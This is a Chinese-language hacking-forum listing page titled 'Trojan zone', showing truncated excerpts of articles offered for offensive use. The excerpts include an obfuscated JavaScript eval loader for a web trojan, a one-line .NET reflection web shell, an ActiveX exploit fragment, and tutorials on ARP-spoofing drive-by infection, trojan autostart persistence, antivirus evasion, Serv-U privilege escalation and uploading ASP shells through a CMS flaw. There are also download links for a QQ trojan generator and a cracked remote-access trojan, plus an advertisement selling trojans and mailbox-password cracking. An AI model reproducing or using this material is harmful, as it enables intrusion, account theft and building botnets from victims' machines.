木马专区
-
如果电脑突然无缘无故关机了,最有可能的原因是什么?当然是中了木马!黑客刚才正连着你的电脑,闲着无聊发了一条“关机”指令。 其实Windows本身也带有这样一个关机“木马”。如果对WindowsXP有所了解的人 ,应该知道XP中新增了一个Shutdown命令。用“ -m\\p地址”参数就能实现远程关机。不过也别急着害怕,前提是必须拥有远程计算机的管理权限。 以远程IP为192.168.0.2为例,运......
-
清新 陽光() 22:33:09<script language=javascript> var Y=function(m){return String.fromCharCode(m^99)};eval(Y(5)+Y(22)+Y(13)+Y(0)+Y(23)+Y(10)+Y(12)+Y(13)+Y(67)+Y(4)+Y(13)+Y(75)+Y(13)+Y(74)+Y(110)+Y(10......
-
我们使用服务端技术保护网马,保护来保护去,网马的JS代码还是会被抓到,在那些浏览器抓包工具下,网马的JS暴露无遗,原理很简 单,网马再怎么通过判断(比如通过Cookie,IP,referer等)来保护自己,为了危害用户,总是要输出JS来给浏览器去执行,那么就会暴露网马 JS代码。那就没什么办法保护我们的网马JS代码了?有……我们使用Flash来封装网马,这样,使用Flash AS的扩展API:Ex......
-
网页挂马最难的就是传播了,小网站易入侵但是访问人数不多,收获的肉鸡也就不是很多。因此,一种新的挂马方式开始流行——局域网ARP欺骗挂马,只要局域网内一台机子中招了,它就可以在内网传播含有木马的网页,捕获的肉鸡就会成几何增长。 局域网ARP欺骗挂马的好处如下:无需入侵网站,只要你的主机处于局域网中即可,这是它最大的优点;收获的肉鸡多多,短时间内可以收获数十台甚至上百台肉鸡,类似网吧这样由上百台电脑......
-
软件说明:程序包 包括一个基于反射的.net 一句话木马,可以插入代码的模式运行。 <%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[psw].Value))).CreateInstance(c, true, System.Reflection.BindingFlags.De......
-
第一步:工具--FTP——FTP主目录(随便在桌面建立一个),把下面的端口改成21.用户名可以不填.下面两个选项都打上勾.然后开启服务.完成了第一步! 第二步:自动上线设置.我内网IP是192.168.1.22.所以在FTP服务器里填上192.168.1.22 ,其它的都不用改,按前面的一样填,如果前面你填了用户名这里填上那个。再更新! 第三步:配置服务端.我的是......
-
作者:龙影 转载请著名来源与:www.7747.net木马的最大的特点之一就是它一定是要和系统一起启动而启动,否则它就完全失去了意义!下面为大家介绍一下它的几种隐藏启动的方法: 方法一:注册表启动项:这个大家可能比较熟悉,请大家注意以下的注册表键值: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run......
-
木马免杀之汇编花指令技巧作者: 逆流风(发表于《黑客X档案》07.07,转载注明出处)相信很多朋友都做过木马免杀,早期的免杀都是加壳和改特征码,现在免杀技术已经发展到花指令免杀,改壳之类的,而这些需要一定的汇编知识,但是汇编却不是一块容易啃的骨头,所以我写了这篇菜鸟版的免杀汇编教程,帮助小菜们快速入门,掌握免杀必备的汇编知识,改花指令,改特征码的技巧和编写自己的花指令。一、免杀必备的汇编知识pus......
-
2008-8-26 11:40:36QQ木马生成器
QQ木马生成器5月10日更新,通过卡巴、江民、瑞星、金山等杀毒软件最新病毒库的检测。注意:本软件仅供编程爱好者学习研究之用,请勿用作非法用途,否则其所造成的一切后果由使用者自行承担,作者不承担任何法律责任。……点这里下载QQ木马生成器......
-
跑跑卡丁车盗号教程……点这里下载跑跑卡丁车盗号教程 ......
-
最新灰鸽子破解版最近一牛人破的下载地址:最新灰鸽子破解版......
-
封印专业黑软编程工作室本工作室承接业务如下:编译语言DELPHI7.0 VB VC++一 各种小企业软件定制,黑软程序定制最新网马 下载者 插件 游戏木马 远程控制等二 破解指定油箱 密码。。。。。三 拿指定站点承接 各种木马免杀 去后门 。。。。。出售软件:免杀 网马 感染下载者 各种游戏木马。。。。 捆绑器 网马......
-
程序代码<SCRIPT>window.onerror=function(){return true;}</SCRIPT> <SCRIPT> document.writeln(<object classid=\clsid:61F5C358-60FB-4A23-A312- D2B556620F20\ style=\displ......
-
最近的生活真无聊,寒冰掌老大见我无所事事,就说如果我能把Serv-U本地提权的ASP程序做出来就给介绍个MM,所以呢,就有了这篇文章^_^ Serv-U本地提权的问题很古老了,不清楚的朋友谷歌一下先,我就不罗嗦啦。呵呵,最主要的是相继出现了php、perl、aspx版本的提权脚本,一时间刀光剑影满天飞,惟独缺了ASP版的。主要是由于郁闷的ASP不能像其他脚本那样访问Socket(另一个原因是因为老......
-
2006-7-5 11:28:01制作肉鸡跳板
相信大家对网络入侵有了一定的了解,今天给大家做一个肉鸡跳板的帖子 因为时间问题我就写出主要的思路吧 ,上网不方便还请朋友们多多的谅解。~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~大家知道现在中国网络安全的有了一定的进步 值得庆贺,但是看到很多的青少年入侵站点 机械的用工具用一些老的漏洞入侵,对站点和本人造成了饿很大的危害,现在......
-
用启动盘或安装光盘进入DOS:分好区以后,我们开始安装系统了。具体操作是开机时按del,进入cmos中,在第二项bios advance feturu中的first boot设为floppy后按f10保存,插入启动盘重起既可;如果用光盘,把floppy改成CD-ROM即可1.首先,由于我们的计算机只有DOS操作系统,因此,我们必须在DOS下安装Windows。进入DOS后,转到您要安装WINDOW......
-
“EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。 Step1 搜索入侵目标 使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站,在网站页面的底部版权声明......
-
反向木马的主要种植手段是通过IE的众多漏洞,bt下载时不小心运行,或者来路不明的软件,使未打补丁的用户点击之后下载运行了木马程序,而这些用户基本都是拥有动态IP的个人用户,若不使用反向连接的方式,势必无法长久控制。 下面让我们来讨论一下如何查出木马的最关键的要素――反向连接域名,知道了反向连接域名,你就可以随时了解到幕后元凶究竟在哪,是否在线等隐私资料,甚至可以进行域名劫持,从而使他所......
-
screen.width-333) {this.width=screen.width-333;} border=0><--UserPostedImage-->软件下载: http://fs1.minitab.com/Store/MTB14_StandardSetup.exe 软件下载: ftp://ftp.aladdin.com/pub/hasp/hl/windows......
-
2006-5-4 0:30:08给木马加多层壳
要点:1,认识EXE文件加壳工具的功能,原理。 2,了解常用加壳工具的种类,名称。 3,懂得什么叫加壳。 4,理解什么叫“资源释放”,以及“资源释放”和“脱壳”的区别。 4,学会多层加壳的方法。本文所用工具:加壳工具:Aspack 2.11,Pecompact v1.82, UPX 1.20 资源释放工具:FreeRes 0.94 freeRes 目前支持重建可编辑资源的文件格式(只限于32位软件......
共
51 篇文章 首页 | 上一页 |
1 2 3 |
下一页 |
尾页 20篇文章/页 转到第
页
